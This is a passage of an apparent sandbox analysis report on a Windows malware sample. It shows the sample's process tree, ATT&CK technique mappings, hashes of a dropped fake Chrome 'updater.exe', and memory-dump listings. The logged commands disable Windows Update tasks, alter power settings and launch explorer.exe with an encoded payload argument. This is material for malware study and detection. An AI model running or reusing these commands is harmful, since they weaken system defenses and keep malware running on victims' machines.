SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:2312

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:4396

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:3252

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1120

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:4984

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:4516

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:3156

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:2104

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "bmkeytcye"
4⤵
PID:4068

C:\Windows\explorer.exe
C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2238871af228384f4b8cdc65117ba9f1

SHA1
2a200725f1f32e5a12546aa7fd7a8c5906757bd1

SHA256
daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

SHA512
1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
\??\pipe\LOCAL\crashpad_5048_KOXSMRKMQDAMJWBC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/220-231-0x0000000000000000-mapping.dmp

Download
memory/312-148-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmp

Filesize
2.0MB

Download
memory/312-147-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/312-143-0x0000000000000000-mapping.dmp

Download
memory/312-146-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/316-230-0x0000000000000000-mapping.dmp

Download
memory/372-162-0x0000000000000000-mapping.dmp

Download
memory/400-178-0x0000000000000000-mapping.dmp

Download
memory/428-241-0x0000000000000000-mapping.dmp

Download
memory/516-232-0x0000000000000000-mapping.dmp

Download
memory/792-226-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/792-256-0x00000155DF520000-0x00000155DF532000-memory.dmp

Filesize
72KB

Download
memory/792-223-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/792-262-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/1052-196-0x0000000000000000-mapping.dmp

Download
memory/1120-242-0x0000000000000000-mapping.dmp

Download
memory/1224-188-0x0000000000000000-mapping.dmp

Download
memory/1244-155-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/1244-153-0x000001D454BF0000-0x000001D454C12000-memory.dmp

Filesize
136KB

Download
memory/1244-152-0x0000000000000000-mapping.dmp

Download
memory/1472-164-0x0000000000000000-mapping.dmp

Download
memory/1528-205-0x0000000000000000-mapping.dmp

Download
memory/1612-167-0x0000000000000000-mapping.dmp

Download
memory/1732-204-0x0000000000000000-mapping.dmp

Download
memory/1776-195-0x0000000000000000-mapping.dmp

Download
memory/1860-251-0x0000000000000000-mapping.dmp

Download
memory/1968-173-0x0000000000000000-mapping.dmp

Download
memory/1996-198-0x0000000000000000-mapping.dmp

Download
memory/2012-210-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/2012-213-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/2012-208-0x0000000000000000-mapping.dmp

Download
memory/2012-211-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/2012-212-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmp

Filesize
2.0MB

Download
memory/2012-214-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-237-0x0000019852900000-0x0000019852906000-memory.dmp

Filesize
24KB

Download
memory/2064-240-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/2064-215-0x0000000000000000-mapping.dmp

Download
memory/2064-236-0x00000198528F0000-0x00000198528F8000-memory.dmp

Filesize
32KB

Download
memory/2064-235-0x0000019852930000-0x000001985294A000-memory.dmp

Filesize
104KB

Download
memory/2064-228-0x00000198526D0000-0x00000198526EC000-memory.dmp

Filesize
112KB

Download
memory/2064-234-0x00000198524C0000-0x00000198524CA000-memory.dmp

Filesize
40KB

Download
memory/2064-233-0x0000019852910000-0x000001985292C000-memory.dmp

Filesize
112KB

Download
memory/2064-229-0x00000198524B0000-0x00000198524BA000-memory.dmp

Filesize
40KB

Download
memory/2064-227-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/2064-238-0x0000019852950000-0x000001985295A000-memory.dmp

Filesize
40KB

Download
memory/2064-224-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/2160-193-0x0000000000000000-mapping.dmp

Download
memory/2192-254-0x0000000000000000-mapping.dmp

Download
memory/2224-247-0x0000000000000000-mapping.dmp

Download
memory/2284-186-0x0000000000000000-mapping.dmp

Download
memory/2336-255-0x0000000000000000-mapping.dmp

Download
memory/2344-197-0x0000000000000000-mapping.dmp

Download
memory/2788-192-0x0000000000000000-mapping.dmp

Download
memory/2852-171-0x0000000000000000-mapping.dmp

Download
memory/2952-163-0x0000000000000000-mapping.dmp

Download
memory/3132-263-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3132-261-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3132-264-0x0000000000C50000-0x0000000000C70000-memory.dmp

Filesize
128KB

Download
memory/3132-265-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3132-259-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3132-267-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3140-249-0x0000000000000000-mapping.dmp

Download
memory/3144-203-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/3144-225-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/3292-170-0x0000000000000000-mapping.dmp

Download
memory/3292-202-0x0000000000000000-mapping.dmp

Download
memory/3316-180-0x0000000000000000-mapping.dmp

Download
memory/3404-183-0x0000000000000000-mapping.dmp

Download
memory/3484-176-0x0000000000000000-mapping.dmp

Download
memory/3840-168-0x0000000000000000-mapping.dmp

Download
memory/3840-201-0x0000000000000000-mapping.dmp

Download
memory/3880-217-0x0000000000000000-mapping.dmp

Download
memory/3924-190-0x0000000000000000-mapping.dmp

Download
memory/3928-199-0x0000000000000000-mapping.dmp

Download
memory/3928-165-0x0000000000000000-mapping.dmp

Download
memory/3980-219-0x0000000000000000-mapping.dmp

Download
memory/4068-266-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/4068-258-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/4068-257-0x00000241D07E0000-0x00000241D07E7000-memory.dmp

Filesize
28KB

Download
memory/4108-245-0x0000000000000000-mapping.dmp

Download
memory/4192-160-0x0000000000000000-mapping.dmp

Download
memory/4276-151-0x0000000000000000-mapping.dmp

Download
memory/4364-172-0x0000000000000000-mapping.dmp

Download
memory/4364-252-0x0000000000000000-mapping.dmp

Download
memory/4416-169-0x0000000000000000-mapping.dmp

Download
memory/4416-184-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/4416-200-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/4424-161-0x0000000000000000-mapping.dmp

Download
memory/4516-246-0x0000000000000000-mapping.dmp

Download
memory/4552-194-0x0000000000000000-mapping.dmp

Download
memory/4676-250-0x0000000000000000-mapping.dmp

Download
memory/4696-133-0x0000000005650000-0x000000000575A000-memory.dmp

Filesize
1.0MB

Download
memory/4696-135-0x00000000058C0000-0x0000000005936000-memory.dmp

Filesize
472KB

Download
memory/4696-139-0x00000000061C0000-0x0000000006226000-memory.dmp

Filesize
408KB

Download
memory/4696-138-0x00000000060C0000-0x00000000060DE000-memory.dmp

Filesize
120KB

Download
memory/4696-130-0x0000000000B90000-0x0000000000BB0000-memory.dmp

Filesize
128KB

Download
memory/4696-140-0x0000000007D60000-0x0000000007F22000-memory.dmp

Filesize
1.8MB

Download
memory/4696-136-0x00000000059E0000-0x0000000005A72000-memory.dmp

Filesize
584KB

Download
memory/4696-132-0x0000000005520000-0x0000000005532000-memory.dmp

Filesize
72KB

Download
memory/4696-141-0x0000000008460000-0x000000000898C000-memory.dmp

Filesize
5.2MB

Download
memory/4696-142-0x0000000007110000-0x0000000007160000-memory.dmp

Filesize
320KB

Download
memory/4696-131-0x0000000005A80000-0x0000000006098000-memory.dmp

Filesize
6.1MB

Download
memory/4696-134-0x0000000005580000-0x00000000055BC000-memory.dmp

Filesize
240KB

Download
memory/4696-137-0x0000000006650000-0x0000000006BF4000-memory.dmp

Filesize
5.6MB

Download
memory/4728-221-0x0000000000000000-mapping.dmp

Download
memory/4852-248-0x0000000000000000-mapping.dmp

Download
memory/4892-156-0x0000000000000000-mapping.dmp

Download
memory/4908-157-0x0000000000000000-mapping.dmp

Download
memory/4920-253-0x0000000000000000-mapping.dmp

Download
memory/4928-159-0x0000000000000000-mapping.dmp

Download
memory/4984-243-0x0000000000000000-mapping.dmp

Download
memory/5000-244-0x0000000000000000-mapping.dmp

Download
memory/5028-154-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/5028-150-0x000001F57AB00000-0x000001F57AF1E000-memory.dmp

Filesize
4.1MB

Download
memory/5028-206-0x00007FFE885C0000-0x00007FFE89081000-memory.dmp

Filesize
10.8MB

Download
memory/5048-149-0x0000000000000000-mapping.dmp

Download
memory/5076-166-0x0000000000000000-mapping.dmp

Download
memory/5092-158-0x0000000000000000-mapping.dmp

Download